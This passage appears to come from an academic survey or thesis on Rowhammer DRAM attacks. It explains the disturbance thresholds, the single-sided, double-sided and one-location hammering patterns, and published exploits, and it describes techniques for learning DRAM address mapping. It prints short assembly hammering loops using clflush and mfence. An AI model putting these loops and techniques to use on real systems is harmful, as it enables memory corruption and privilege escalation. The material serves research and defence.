푡푟푒푡−푅퐻 훽 − 1 푅퐻푡ℎ = × 푀푚푎푥 = × 푀푚푎푥 푡푟푒푡−푡ℎ 훼 − 1 where β represent the reduced leakage current after the guard-band is applied and α the scalar multiplier to the natural leakage current. The Threshold number of Activations (Nth) can be defined as the minimum number of activations that are required to induce an error when RI is the default value of 64ms. At 푡푟푒푡−푡ℎ = 64 푚푠

푀푚푎푥 ≈ 1.3 푚𝑖푙푙𝑖표푛. Then:

30

훽 − 1 푁 = × 1.3푀 푡ℎ 훼 − 1

The research at [40] has described the ranges values of α from 4 to 11.7. For example, at α=11 1 and β=2 the 푁 = × 1.3푀 = 130퐾. 푡ℎ 10 The Nth for each manufacturer is different and the values going from 139K until 284K activations [1]. Diversely, 2x1M read operations on each aggressor page are necessary to trigger the vulnerability for LPDDR3, LPDDR2 and LPDDR4 at ARMv7 and ARMv8 based devices [2]. The value of α is related to the fabrication process and is increasing as DRAM scales down. Then, due to the future nanoscale DRAM, the Nth values can be expected to be very much reduced until achieving a few tens of thousands.

3.1.1 Data Pattern and Weak cells effect The victim bit state must be charged to the disturbance affect the value by discharging it. Depends on the specific DRAM cell orientation this will implicate a 1 to 0 error or 0 to 1. There are cases where both orientations are used in distinct parts of the same DRAM module. Therefore, the probability of flip bits on a specific row depends on the digital data kept in this row as well as the orientation of the specific row cells [1]. When the memory module orientation is unknown before the attack, different data patterns must be proven in the search for rowhammer vulnerabilities on the specific system [1] [41]. Furthermore, the behaviour of most victims cells is correlated with the data stored in some other cells, considering N-body phenomenon that involves the iteration of multiples cells. Certain aggressor cells, typically located at aggressor rows, must be discharged to trigger an error. Contrarily, the discharging or charging of protector cells, frequently residing at aggressor or victim rows, reduces the probability of having an error. Some extra sensitive results can be extracted from the studies at [1]. They prove that the errors are mostly repeatable, once the vulnerable memory location has been identified it is possible to reproduce the bit flip by reading again the same set of aggressor pages. This result has been extendedly used by posterior researches in their attack implementation. It provides the attacker with the possibility of exhaustively search for the location of memory vulnerabilities. And then, trick the memory controller to place the under attack page at the aforementioned vulnerable place [2] [42]. The weak cells are the cells with the shortest retention times, intuitively it would appear to be especially vulnerable to disturbance errors since they are already leaker than others. On the contrary, any strong correlation between weal cells and victim cells was found out at [1]. The coupling pathway responsible for disturbance errors may be independent of the process variation responsible for weak cells. Also, the specific disturbance phenomenon is not strongly influenced by temperature.

3.2 TRIGGERING ROWHAMMER By repeatedly accessing, hammering, the same memory row (aggressor row) an attacker can cause enough disturbance in a neighbouring row (victim row) to cause a bit flip. This can be

31 software triggering by using a code with a loop that generates millions of reads to two different DRAM rows of the same bank in each iteration. Memory access consists of different stages (2.5). In the ACTIVE stage, firstly a row is activated to transfer the data row to the bank’s row buffer by toggling ON its specific associated wordline. Secondly, the specific column from the row is read/written (READ/WRITE stage) from or to the row buffer. Finally, the row is closed, by pre-charging (PRECHARGE stage) the specific bank, writing back the value to the row and plugging OFF the wordline. The disturbance error is produced on a DRAM row when a nearby wordline voltage is toggled repeatedly, meaning that it is produced on the repeated ACTIVE/PRECHARGE of rows and not on the column READ/WRITE stage. The code must guarantee that each access corresponds to a new row activation in order to trigger rowhammer. When the memory controller uses an open page policy (2.5) the recent access row is keeping open on a buffer on a try to reduce the ACTIVE and PRECHARGE commands if the same address is access continuously. Then, if the same physical address is accessed continuously, the corresponding data is already in the row buffer and no new activation is produced. Therefore, in this case, two physical addresses that correspond to rows on the same bank must be accessed to guarantee that the row buffer is clearing between memory access. A code to induce the disturbance at the real system, which is based on an open page memory controller policy, was firstly constructed at [1]. They use a code with a loop that generates millions of reads to two different DRAM rows of the same bank in each iteration. It is designed to generate a read to DRAM on every data access. The code consists of two mov instructions that read data from DRAM at address X and Y and move into a register, two clflush instruction that evict both accessed data from the cache, a mfence instruction that ensures that the data is fully flushed before any subsequent memory instruction and finally the code jumps back to the first instruction for a new interaction. code: mov (X), %eax mov (Y), %ebx clflush (X) clflush (Y) mfence jmp code To guaranty the direct access to the DRAM two are the keys of the code:  The two consecutive mov instruction at two different DRAM address. If just one address is accessed on each loop the row is accessed directly from the row buffer which does not toggle the wireline avoiding the disturbance effect. The values of X and Y must be choosing correctly so that map different rows within the same bank to guarantee the eviction of the row buffer on each memory access.  It is necessary to flush the cache on each iteration to access directly the DRAM on each memory access. At the point of the study [1] they just use a clflush command.

32

On the other hand, recent studies [43] have proposed a new rowhammer attack method for close page memory controller policies. The closed page policy (2.5) immediately close the row and precharge the bank to be ready for a new open row. In this case, it is not necessary to evict the row buffer to toggled the row then a simpler code can trigger the vulnerability: code: mov (X), %eax clflush (X) mfence jmp code

3.2.1 Rowhammer Types In this section its overview the different methods to hammer a vulnerable DRAM depending on their memory access pattern. A schematic that compares the three hammering patterns is shown in Figure 18. The rows mark with a hammer are the hammered locations (aggressor rows) and the grey ones are the most like location to have bit flips (victim rows). Note that the way of conducting hammering affects the efficiency of flipping bits, so the method used on each case must be cautiously selected deepening on the attack environment.

Figure 18 Different hammering strategies. Figure in [44]

Single-side rowhammer The attacks that rely on the activation of just one aggressor row is called single-side Rowhammer. The single side rowhammer approach has been used on probabilistic attacks. In this case, is enough to know the row size so that addresses on the same bank can be found [1] [45] [46] [47]. The X and Y values just need to map different rows within the same bank to be able to evict the row buffer and access directly the row at the RAM for systems with open page memory controller policy. Note that such a pattern just hammers the victim row from one side, which is generally flexible but slow. A challenge to consider is the need to finding physical addresses that are mappings on rows from the same bank (single-side rowhammer). Early projects confronted these challenges by picked random addresses following probabilistic approaches [1] [45] [46] [47]. If the single-sided hammering uses a set of unrelated addresses and accesses them a high frequency, the probability of two addresses map to the same channel, rank, and bank is lower than 1 , where C is the number of channels, R is the number of ranks, and B is the number of 퐶∙푅∙퐵 banks [48]. Some attacks increase the efficiency of trigger bit flips finding out from before the rows that bellow to the same bank by using different techniques describe at section 4.1.2.

33

3.2.1.2 Double-side rowhammer The double-side rowhammer attack aims to improve the effectiveness of the attack in open page memory controller systems. The method targets a specific memory row and hammering its two neighbouring rows (two aggressor rows), the above and below of the victim row in the physical memory. It can guarantee a reproducible flip of a bit, on vulnerable DRAM memory, for specifically chosen victim address location [2] [37]. Such attacks require knowledge of the physical memory mapping in DRAMs to be able to identify the addresses of the neighbouring rows. The attack is mounted by carefully chose the X and Y values. X and Y addresses will correspond with the physical row above and below of the victim row at the DRAM. The physical address, the bits that correspond to each row, bank, DIMMs (Dual In-line Memory Module) and Memory channel have to comprehend to perform the deterministic double-side rowhammer [2] [37] [49]. Note that these System specifications are commonly property close. Double-side hammering is the most efficient way to perform rowhammer but more complex research regarding the memory architecture of the system under attack must be carried out in order to be able to choose correctly the 3 adjacent rows. In the double-side rowhammer attack, the exact physical address mapping of all the banks should be known to access both rows that are directly above and below the victim one [2] [37] [49].

3.2.1.3 One location hammering. The one-location hammering is a recent attack primitive presented in [43] in 2018. This new technique hammers only one memory location; the attacker does not directly induce row conflicts to evict the row buffer but only re-opens one row permanently. It can be applying at the modern systems which employ most sophisticated memory controller policy (close page policy), that pre-emptively closing rows earlier than necessary, to optimize performance (2.5). With one- location hammering, the attacker only runs a Flush+Reload loop on a single X memory address at the maximum frequency. This continuously re-opens the same DRAM row, whenever the memory controller closes it. This method does not need any knowledge regarding the physical address mapping, not even need to find addresses at the same bank. The attack does not need to access different rows in the same bank which overpass the rowhammer defences based on the detection through analysis of memory access patterns (5.3) such as the propose in [49]. On the other hand, although has been observed that one-location hammering drains enough charge from the DRAM cells to induce bit flips, the per cent of the bits that can be flip is lower than with double-sided and single-side hammering. The research in [43] presents a comparison between the effectivity of the three rowhammer methods. They performed a test at Skylike i7-6700K with 8GB Crucial DDR4-2133 DIMMs that scans the per cent of bit flip during an attempt to hammer random memory locations. They compare the flip bit distribution over 4kB aligned memory regions between double-side hammering, single side hammering, and one-located hammering. It is observed that the flip bit offset is slightly more uniformed for single-side hammer (78.5%) than on double-side hammer (77%) and much worst at one-located hammer (36.5%). Usually, the one-located hammer type is weaker and slower than the other two types, but it is much stealthier as it requires no privileges.

34

3.3 VULNERABLE DRAM TYPES The vulnerability exists in the majority of the commodity DRAM chips, being more prevalent on 40 nm memory technologies. In the work of Carnegie Mellon University [1] the error exists in 110 DDR3 DRAM modules on x86 processors, for all the manufacturer modules from 2013 to 2014. They used an FPGA-based experimental DRAM testing infrastructure that was originally developed for testing retention time issues in DRAM with a DDR3-800 DRAM memory controller and a PCIe 2.0 core. The experiment was made inside of the heating chamber and run at 50 ± 2ºC. In the test of 129 DRAM DDR3 modules manufacturing from 3 different major manufacturers (A, B, C) on the years from 2008 until 2014 exhibited rowhammer errors 110 of them. Figure 19 shows their results categorized based on manufacturing date [50]. Note that all modules form 2012- 2013 are vulnerable.

Figure 19 RowHammer error rate vs. manufacturing date. Figure in [50]

In May 2014 Samsung announced that their DDR4 memory would not be susceptible to Rowhammering because they implement Targeted Row Refresh (TRR), which enables the memory controller to refresh rows adjacent to a certain row (5). They announce that was implemented in all DDR4 modules but it has been removed from the DDR4 standard. Then, whatever if the manufacturer can still choose to implement in their devices if the memory controller does not support it, it will not be effective [51]. At [3] they implement a JavaScript fully automated attack to trigger faults at remote hardware. The attack was successful on Sandy Bridge, Ivy Bridge, Haswell, and Skylake, in various not only DDR3 but also DDR4 configurations. The Crucial DDR4 DIMMs is vulnerable at the default system setting. On the other hand, the G. Skill DDR4 DIMMs has flip bits only at increased refresh interval. This show how much is the vulnerability still crucially depends on the refresh interval chosen by DIMM. Base on the aforementioned results [3], Lanteigne performed an analysis on DDR4 memory [52] proving that rowhammer is certainly reproducible on such technology too, in March 2016. In the experiment, they used their own design tool called Memesis. Memesis is a Linux kernel embedded enterprise memory test which pushes extreme levels of stress and bandwidth between the processors and memory while looking for data corruption and ECC events. They

35 tested across a variety of x86-64 laptops, desktops and dual processor ECC-protected server systems. From the 12 modules under test, that include Intel Skylake based system, Crucial Ballistix Elite 2666 MHz, Geil Super Luce 2400MHz, G.Skyll Ripjaws 4 3200 MHz and Micron branded 2133 MHz DDR4 memory modules, 8 of them show bit flips during their experiments under default refresh rate during the 4-hour experiment. A scan memory tool has been used at [41] to test the rowhammer vulnerability at individual DIMM for default settings. The test consists of the double-side rowhammer attack with a default random pattern during four hours on each DIMM individually. From the 12 memory modules, eight showed a bit flips. Every memory module that failed at the default setting refresh rate happened on DDR4 silicon manufactures by Micron. Some of the Samsung silicon memory modules show a little number of flip bits at 25% Refresh Rate reduction. On August 2016 DRAMA attack was presented [37]. They achieved to implement a double-side rowhammer attack that flip bits in less than 16 seconds at Crucial DDR4-2133 memory module running at the default refresh interval. Just need some minutes to flip bits at the Skylake F4- 3200C16D-16D-16GTZB DDR4 memory, until then considered not vulnerable. In addition, has been achieved to flip bit at DDR4 technology form different attacks such as the Good go Bad rowhammer attack [53] which have flipped bits at Broadwell DDR4 at double refresh time. Furthermore, a recent rowhammer attack for mobile platforms has demonstrated [2] that the majority of LPDDR3-devices (Low Power DDR memory devices) under test are vulnerable and that even LPDDR2 is sensitive, under ARMv7 based processors. The LPDDR4 standard specifies two features to eliminate the rowhammer bug, not just include the TTR but also the Maximum Activation Count (MAC) technique that specifies how often a row ca. Even then at [2] was achieved bit flips on a Google Pixel Phone with 4 GB LPDDR4 memory.

36

4 ROWHAMMER EXPLOITATION

A fundamental assumption in software security is that a memory location can only be modified by a process with write permissions to this memory location. Disturbance errors violate the memory protection invariants that must be guaranteed: read access should not modify data at any address and write access should modify data only at the address is writing to. The row is repeatedly open by both read and writes access inducing disturbance that occurs in rows others that the ones being accessed. Furthermore, a code just by accessing its own page could corrupt pages belonging to other programs since the memory controller could map different rows to different software pages. Hardware fault-attacks typically need to expose the device to specific physical conditions outside of its specification which requires physical access to the device under attack. However, through rowhammer attack hardware faults are induced by software without a need to have direct physical access to the system. Triggering the Rowhammer bug is different than exploiting it. Most bits in memory are irrelevant for an attacker, as flipping them would often just trigger memory corruption, without obtaining any concrete security advantage. For successful exploitation, the attacker has to face the following challenges:  Need to know some memory architecture details to access rows from the same bank on the simplest attacks (single-side rowhammer and one-side rowhammer) or even better to be able to allocate contiguous physical blocks for the double-side rowhammer. The contiguous physical blocks allow accessing virtual addresses that correspond to the two physical rows adjacent to the victim. Section (4.1) presents the necessary memory information for different attacks and various ways to find it.  Must access directly the DRAM chip fast enough. The ability to make the row activation fast enough is a prerequisite to trigger the bug in order to produce the flips before of the . The CPU (Central Processing Unit) Memory Controller must be able to issue memory reads command fast enough to the DRAM chip. Apart from the basic enough fast processor clock, general, the biggest challenge is overpassing the several layer caches that mask out all the CPU memory reads. Then, it is a need to bypass CPU cache (2.6) or use DMA memory (2.8.1) to make sure that each memory read access propagates to the DRAM. Section (4.2) describes several techniques to achieve uncached memory access.  Must be able to land a security-sensitive memory page (e.g., a page owned by the operating system or by another privileged process) into a vulnerable physical memory page. Section (4.3) depict different ways to learn where to hammer. Finally, the challenges of triggering rowhammer in a security-relevant manner are being summarized into different categories depends on the attack interfaces (4.4) used to exploit the vulnerability and the attack targets (4.5). The performed Rowhammer attacks, described at the below subsections, are the following ones:

37

 The GoogleProject0 attack [45] was the first demonstrated practical rowhammer attack. It is a single-side rowhammer (3.2.1.1) attack implemented on the x86-32 or x86-64 architecture based on the use of CLFLUSH instruction. It sprays security-sensitive pages all over the memory and expects the flip bit luckily falls in an exploitable position.  The Non-temporal Rowhammer [47] attack proposes an approach for rowhammer that is based on x86 non-temporal instructions and that can be implemented for scape NaCl sandbox by using the same strategy than at GoogleProject0 attack [45] without the use of CLFLUSH instructions.  The Curious Case of Rowhammer [54] attack demonstrates the feasibility of inducing bit flip faults in RSA Cryptosystem key by using a realistic number of hammering attempts. It is a probabilistic approach that aims firstly to find out where is keeping the key and then, expects to trigger a flip bit luckily in the specific physical memory location.  Dedup est Machina [46] is an attack that combines a memory deduplication-based primitive with a reliable single-side rowhammer exploit to gain arbitrary memory read and write access in the Microsoft edge browser. Using cache eviction set specifically created for Windows OS.  The Flip Feng Shui [42] is an exploitation vector which induces bit flips over arbitrary physical memory in a controlled and deterministic way by exploiting the memory deduplication feature to control the physical memory layout. The attack aims to gain unauthorized access to a co-hosted victim VM (Virtual Memory) on a cloud.  The One Bit Flips, One Cloud Flop [55] is a cross-VM rowhammer attack in which a malicious VM client exploits the induced bit flips to crack Xen Virtualization memory isolation. The attack wins access to a forbidden physical memory location on the shared machine. In order to trigger the double-side rowhammer implement a technique to determine the physical address mapping in DRAM modules at runtime.  The DRAMMER [2] attack is a double-side (3.2.1.2) rowhammer attack on Android/ARM mobiles platforms that use DMA (2.8.1) to overpass the CPU cache. It is a deterministic approach that exploits the predictable memory reuse patterns of standard physical memory allocators. Exploit the contiguous heap of ION that was available from Android 4.0 until the security Android update at 2016. More details are provided in section (6.3)  The SGX-Bomb [56] attack lunches the rowhammer attack against Intel SGX enclave memory to trigger the processor lockdown. A cloud client can trigger a DoS attack by shut down servers shared with other clients.  The Another Flip in the Wall [43] exploits opcode flipping bits in a predictable and targeting way by using a new one-location hammering technique (3.2.1.3) on X86 architecture. The attack uses the waylaying memory technique that exploits system level optimizations and side channel attacks to placing the target page in a vulnerable physical location. They exploited it through DoS (Denay of Service) attacks and System privilege escalation attacks.

38

 The GLitch attack [57] [58] is an effective GPU-based (General Processor Unit) micro architectural attack. It uses primitives that are exposed to the web trough standardize browser extensions and leverage the possibility of trigger side-channels and rowhammer attacks from JavaScript. The end-to-end attack compromises the Firefox JS sandbox on Android platforms by obtaining arbitrary read/write permissions that enable remote code execution.  The Trowhammer attack [59] triggers and exploits rowhammer bit flips directly from a remote machine by only sending network packets through RDMA-enable (Remote Directly Memory Access) networks and is used to gain code execution on a remote key- value server application.  The RAMpage attack [60] is a DMA-based Rowhammer attack against the latest Android OS for mobile platforms. It aims to escalate privilege to root or compromise other apps present on the device. It is an improvement of DRAMMER [2] attack that attempts to overpass the rowhammer countermeasure apply on new Android OS. Ir reserves memory blocks at system heap ION memory pool on a clever way that enables the ability to implement the exploitation techniques used at DRAMMER.  The PFA [61] is a rowhammer-based PFA (Persistent Fault Attack) attack on T-box AES implementation that can be trigger remote. It injects persistent bit fault into the T-tables setting of the Libgcryopt binary file shared library. They validate their attack in an FPGA environment by target AES-128 hardened to recovery the last round key.  The Nethammer [62] is a remote rowhammer attack that does not rely on any attacker- controlled code on the victim machine, just relies on sends a stream of network packets to the target device. It mounts one-location or single-side rowhammer attack by exploiting quality-of-service technology deployed on the device for X86, ARM and, clouds.  The Still Hammerable attack [63] is a novel exploit that aims to defeat the last Rowhammer countermeasure called CATT (5.3). The exploit uses the double-owned kernel buffers, owned concurrently by the kernel and the user domains, to invalidate the physical separation enforced by CATT. The attack gains both root and kernel privileges on X86 Systems using single-side rowhammer. We also reference some interesting researches that do not present end-to-end completed attacks but introduce some crucial tools that establish new advantages on the rowhammer field.  The Rowhammer.js [3] attack is a JavaScript implementation of Rowhammer that induces hardware-faults by a remote software using cache eviction strategic. Notice that is not an end-to-end attack is just a technique to trigger remotely the vulnerability.  The DRAMA [37] studies propose two reverse engineer methods for mapping memory addresses to DRAM channel, ranks, and banks. This DRAM mapping techniques improve the rowhammer attacks and enable for the first-time practical rowhammer attacks on DDR4.

39

 ANVIL [49] introduce a clflush-free technique to trigger rowhammer. It bypasses CPU cache by manipulating the cache replacement state. The specific technique achieves flip bits under double refresh rate.  The Goog go Bad [53] is a virtual-memory cache-flush method that triggers rowhammer at System with double refresh time. It takes advantage of the Cache Allocation Technology (CAT) mechanism to accelerate rowhammer attacks. The technology was designed in part to protect virtual machines from inter-VM DoS attacks.

The rowhammer methods used at each attack are summarized in Table 5. Rowhammer Type single-side RH Double-side RH One location RH GoogleProject0 ✓ Non-Temporal Rowhammer ✓ A curious case of Rowhammer ✓ Dedup Est Machina ✓ Flip Feng Shui ✓ One bit flip, one cloud flop ✓ DRAMMER ✓ SGX-Bomb ✓ Another Flip in the Wall ✓ Glitch ✓ Trowhammer ✓ RAMPAGE ✓ PFA ✓ Nethammer ✓ ✓ Stii Hammerable ✓ Rowhammer.js ✓ DRAMA ✓ ANVIL ✓ ✓ Good go Bad ✓ ✓ Table 5 Rowhammer methods

4.1 UNDER ATTACK MEMORY INFORMATION For probabilistic rowhammer approaches, it is enough to know the row size so that addresses on the same bank can be found to trigger the single-side method (3.2.1.1). On the other hand, the physical address that corresponds to each row, bank, DIMMs and Memory channel is crucial to perform deterministic double-side rowhammer (3.2.1.2). The DRAM address mapping schemes used by the CPU’s memory controllers are not publicly known by major chip companies like Intel and ARM, just AMD discloses which bits of the physical address are used to compute the DRAM bank address. Whit the goal of trigger rowhammer bug, first of all, we have to decide the specific technique that allows us to find the necessary information regarding physical memory location. A summary of the various techniques used in each attack is shown in Table 6.

40

Techniques to detect Memory Information One-location Same Bank accesses Adjacency Memory detection hammer random Pagemap Row Conflict Huge Physical Reverse DMA Row-conflict access file side channel page Prove engineering Side-channel GoogleProject0 ✓ ✓ Non-Temporal RH ✓ ✓ Curious case of RH ✓ ✓ ✓ Dedup Est Machina ✓ ✓ Flip Feng Shui ✓ ✓ ✓ One bit flip, one cloud flop ✓ ✓ DRAMMER ✓ ✓ SGX-Bomb ✓ ✓ Another Flip in the Wall ✓ Glitch ✓ Trowhammer ✓ RAMPAGE ✓ ✓ PFA ✓ ✓ Nethammer ✓ ✓ Sill Hammerable ✓ Rowhammer.js ✓ ✓ DRAMA ✓ ✓ ✓ ANVIL ✓ ✓ Good go Bad ✓ ✓ Table 6 Various techniques to learn the required memory information

4.1.1 One-location hammer The one-location hammer type does not need any knowledge regarding the memory information to trigger a flip bit. The attacker only needs to access one single location at high frequency in a modern processor which do not use strict open page policies anymore. The attacker on a system which memory controller close-page policy does not directly induce row conflicts but instead keep re-opening one row permanently because the memory controller pre-emptively closes rows earlier than necessary. Then, it does not need to find addresses at the same bank in order to trigger it. The specific type of hammering is in themselves a method to overpass the first primitive in the process to trigger the vulnerability.  The Another Flip in the Wall attack [43] was the first to prove the one-location hammering. The attacker just runs Flush+Reload loop on a single memory address at the maximum frequency. They use a prefetch address-translation oracle attack presented at [64] to find out when two virtual addresses map to the same physical address. The technique consists of a sequence of prefetch instruction and FLUSH+RELOAD attack to measure the effect of the prefetch which requires a highly accurate timing measurement method. Relies on the statement that prefetching addresses that are not mapped to physical pages introduce non-deterministic performance penalties [64].

41

 The Nethammer attack [62] implement a random one-location rowhammer that is trigger remotely by sending just network packet to the victim system. They do not put any effort to find out any memory characteristic.

4.1.2 Same bank row detection It is necessary to access addresses that correspond to rows at the same bank in order to avoid the row buffer conflict at single-side rowhammer attacks.

4.1.2.1 Pagemap file The first attack proposed at GoogleProject0 [1] [45] use directly physical addresses. At [1] the vulnerability is just tested using a customized Memtest86 environment to bypass address translation. To access rows at the same bank they partial reverse engineering the addressing scheme for Intel processor using the techniques publicized at [65] [66] and, determined that accesses physical addresses with 8MB offset corresponded to same banks rows. At Non-temporal Rowhammer [47], Curious Case of Rowhammer [54] and PFA [61] they find the base directly physical address to access by using the /proc/$PID/pagemap system file on Linux. This file provides to the userspace process with the physical frame in which each virtual page is mapped to. Since Linux 4.0, the version relies upon early 2015, this information can be access just from privilege users in order to hide it to possible rowhammer exploitation [67] [68]. Then, has been also proposed a random approach which picks pair addresses aleatory at [45]. If the rank is composed of 8 banks a 1/8 chance of getting a row-conflict pair is achieved, by access more rows at a time this probability increased. The ANVIL clflush-free technique uses the Linux /proc/$PID/pagemap utility to convert virtual addresses to physical addresses to find out the cache eviction set pattern.

4.1.2.2 Row-conflict side channel The Row-conflict side channel method is based on the fact that concurrent accesses to different rows in the same bank result in row-buffer conflict that leads to higher access time. Timing analysis is performed at the Curious Case of Rowhammer [54] to successfully determinate the bank of the DRAM for the victim row. The specific attack aims to flip bits at the specific physical DRAM location in which is kept the secret. Then, they need to find out the bank in which is kept it. They trigger concurrent access from a spy to the DRAM banks during decryption while measures repeatedly the access time to the DRAM. The Flip Feng Shui [42] attack rely on row-conflict side channel for picking the hammering addresses into each row to speed up the searching for bit flips on each row. At the DRUMMER attack and RAMpage attack [60] they propose a similar timing-based side channel to determine rowsize of the DRAM chip (6.3). Also, the automatic reverse engineering strategies presented at the DRAMA [37] and One Bit Flip, one cloud Flops [55] are based on Row-conflict side channel attack to determine the physical bits from the address that point banks. The SGX-Bomb [56] has also developed an exploit based on the information find it by using a side-channel attack. Aims to find a virtual address that map to the same bank in the DRAM within an enclave. They categorize the actions in terms of timing: access the same rows, access rows in different banks and access rows in the same bank. The

42

Good go Bad attack [53] use the row-buffer side channel to find the address bit rows at the address mapping on their reverse engineering attempt to find the address mapping for the specific Bradwell Intell DDR4 processor. The Still Hammerable [63] attack use the random strategic of single-side rowhammer. Once again they use the timing side channel rowbuffer to find the address that are in different rows within the same bank to be able to evict the repeatedly reload and clear the row-buffer to make directly memory access.

4.1.3 Find Adjacent Memory Rows To trigger double-side rowhammer it is necessary to know exactly the adjacency memory rows to the target one. Also, in order to be able to trigger the rowhammer in a more deterministic way, it is necessary to allocate and access physical contiguous memory blocks. The different propose techniques are being resumed on subsequent subsections.

4.1.3.1 Huge Pages The huge pages are blocks of memory that come in sizes of 4MB on x86-32, 2MB on x86-64, and 256MB on IA64. Are backed by contiguous physical addresses. Generally, are allocated and defined at boot time from the kernel. This feature enables the Linux kernel to manage large pages of memory to improve performance, by need fewer page tables to access and maintain. The smaller number of pages reduces the overhead through memory operations and reduces the likelihood of a bottleneck during page tables access. The Transparent Huge Page (THP) is a Linux kernel feature that runs in the background and merges virtual contiguous normal pages (i.e 4kB pages) into huge pages in contiguous pieces of physical memory. When the THP future is enabled by default the kernel attempt to satisfy a memory allocation using huge pages. If none of the pages is available (due to non-availability of physically contiguous memory for example) the kernel will fall back to the regular 4KB pages. When this feature is enabled guarantees that two rows contiguous in virtual memory are also contiguous at physical memory. Then, although this is not a fine-grained as known absolute physical address, contiguous physical rows can be accessed by using relative offsets into the huge page.  The first JavaScript attack implemented at Rowhammer.js [3], is premised on the fact that large type arrays are allocated 1MB aligned resulting in the allocation of anonymous 2MB pages for any scripting language in common browsers (Firefox 39 and Google Chrome) on Linux environments. In that case, knowing the offset in the array the lowest 21 bits of the virtual and physical address is also known. The 2MB region of the array is divided into 16-row offsets of size 128KB (single channel). Some rows at the page borders cannot be double hammered as they have no neighboured rows at the same 2MB pages but can be hammered a 14 possible row offsets.  The Flip Feng Shui [42], a VM cloud server attack, exploits also the THP property enable by default on both host and guest. Both guest and host kernel request allocation aligning the buffer at a 2MB boundary. The buffer is backed up by huge page if the virtual address starts with “1” for X86_64-bit architecture and both virtual and physical addresses have the value

43

zero at the lowest 20 bits positions. Thus, the start of the allocated buffer is the start of a memory row and double-sided rowhammer can be successively performed by accessing rows with addresses shift inside the huge page. The attack relies on the KSM (Kernel same-page merging) feature that merges memory pages with the same contents which do not support deduplication of huge pages. KSM prioritize reducing memory footprint over reducing page table entries breaking down the huge page into smaller if there is a small page inside with similar contents to another page. The implementation of techniques that avoid KSM during the template phase and retains control over which victim page should map to the vulnerable huge page must be enforced to can use implement an efficient and reliable attack.  The rowhammer Microsoft edge attack called Dedup est Machina [46] implements a single- side rowhammer in JavaScript to assault the Windows edge browser. The large allocations are not backed by contiguous physical pages in Windows OS. Then, it cannot be used the CPU memory pools to find memory pages that belong to adjacent memory rows for performing double-side rowhammer. They allocate a large array filled with doubles and then hammer 32 pages at a time by reading each page two million times.  The Throwhammer attack [59] uses the RDMA2 (Remote Directly Memory Access) ability for transferring packets efficiently and trigger the rowhammer vulnerability by access packets remote on a server. Due to the remote nature of the attack, the physical address that map the target DMA buffer cannot be known. Fortunately, the server’s Linux kernel automatically backs the RDMA buffer memory into huge pages. This provides to the attacker with the opportunity to trigger double-side rowhammer remotely in a similar way than the one used in Rowhammer.js [3] and Flip Feng Shui [42].  The SGX-Bomb [56] lays on the fact that the Linux SGX3 driver allocates the EPC (Enclave Page Cache) during the initialization of the enclave, and every EPC memory region is physical contiguous allocated at boot time. In this way, they are able to use the double-side rowhammer attack because, the conflict rows, that has been found using the row-conflict side-channel attack, are mapped into sequentially physical addresses in the EPC region.

4.1.3.2 Reverse engineering Different methods and techniques can be applying to reverse engineering the address mapping to the exact channel, rank and bank functions for a variety of systems.  The control signals that mapping the physical addresses to DRAM channels, ranks and banks can be found by physical probe the memory bus and directly read it during memory access. The DIMM slot exposes the metal contacts in the slits on the side and by inserting a slim piece of metal into them, physical contact can be established. Then, using a high- bandwidth oscilloscope to measure the voltage at the pin its logic can be deduced. Every platform need to be measured only once since the addressing function is learned an

2 RDMA is a direct memory access from the memory of one computer into that of another without involving either one's operating system. 3 The Intel Software Guard Extension (SGX) is an extension to the x86 architecture that allows running an application in a completely isolated secure enclave. Include a set of CPU instruction codes from Intel that allows user-level code to allocate private regions of memory, called enclaves, that are also encrypted.

44

attack to a similar machine does not need physical access and the addresses mapping can be reconstructed for each signal individually and exactly. The drawbacks of this method are the expensive measurement equipment and the required of physical access to the internals of the tested machine. The addressing functions must be linear, for example, XORs of physical address bits to can be implemented this technique. At DRAMA [37] they successfully use this method on Intel microarchitectures [69] and Sandy Bridge [70] that have linear addresses function.  The easier way to know the specific address bits used for bank, channel, columns, rank and row is to investigate (reverse engineering) the DRAM row mapping just for the specific DDR under attack. The disadvantage is that do not provide a general tool to be exploited independently of the memory technology. This approach is used at Good go Bad attack [53] where they provide the address mapping for the Intel Broadwell processor DDR4. They use the controller’s performance counter [53] to count the number of access to a specific DRAM channel and bank and determine the physical address mapping. They find out the row bits by analyzing the latency different at memory access due to row buffer.  An automated reverse engineering process can run in unprivileged and possible restricted environments by performing a time analysis side channel which can be used to determine if two physical memory addresses are mapped to the same bank. It exploits the fact that row conflicts at the row buffer lead to higher memory access times. Therefore, if two addresses are located in different rows of the same bank a longest access latency it is being observed. Two different algorithms have been proposed at the Proceeding of the 25th USENIX Security Symposium in 2016, DRAMA [37] and One Bit Flips, One Cloud Flop [55]. o The algorithm proposed in DRAMA [37] first creates an address pool with random addresses from a large array. A small subset of them is tested against all others in the pool and subsequently grouped into sets having the same channel, DIMM, rank, and bank. Then, the identified address sets are using to reconstruct the addressing functions. At this steep, they need at least a partial resolution of the tested virtual address to physical ones. Can be used either the availability of 2MB pages (4.1.3) or privilege information such as the ones provided by the /proc/pid/pagemap file (4.1.1). Now the space to search is small enough to perform a brute-force search of linear function within seconds. It is generated all linear functions that use exactly n bits as coefficients and then applied them to all addresses on a set. Staring with n=1 and increasing n subsequently. Finally, they find a list of possible addresses functions that contain also linear combinations of the actual DRAM addressing functions. Then, later of select the lower coefficients the result must be verified by performing a software-based timing test. They implement an automated process for reverse engineering DRAM addressing a tool that can be used to improve the accuracy, efficiency, and success rate of existing Rowhammer attacks.

45

o The algorithm proposed at One Bit Flips, One Cloud Flop [55] is called Graph- based Bit Detection Algorithm. The graph construction is based on the results produced by the LATENCY() algorithm which calculate the average access latency during the read of addresses pairs that differ only at the bit position specified as input. Each bit in a physical address is considering a node in a graph and the relations between nodes are establishing using memory access latency. At the first graph, the edge will connect nodes that correspond to the bit used as input of LATENCY() when high access latency is returned. The bit detection algorithm work under the assumption that the address mapping algorithm uses XOR-schemes, which is true for Intel´s DRAM address mapping. From an analysis of the graph can be easy detected the row and column bits. Any memory addresses that differ only in a set of bits and achieve high latency during access are located on different rows of the same bank. The specific bits are row bit and are used to select the row inside the bank. The nodes that are not row bits but, when are selected with others that are, produce high latency corresponds to columns bits. A high latency, in both cases, shows that are being accesses addresses in the same bank, then the specific bits cannot specify the bank index. For detecting bank bits an undirected graph is constructed with the subset of nodes excluding the nodes that correspond to row bits and columns bits. The graph’s edges connect nodes corresponding with bits that produce high latency accesses. All nodes connected to the new graph are involved in the XOR-scheme that produce one bank bit. They used their automatic reverse tool to identify the physical address mapping in DRAMs and develop an algorithm to conduct double side rowhammer attacks 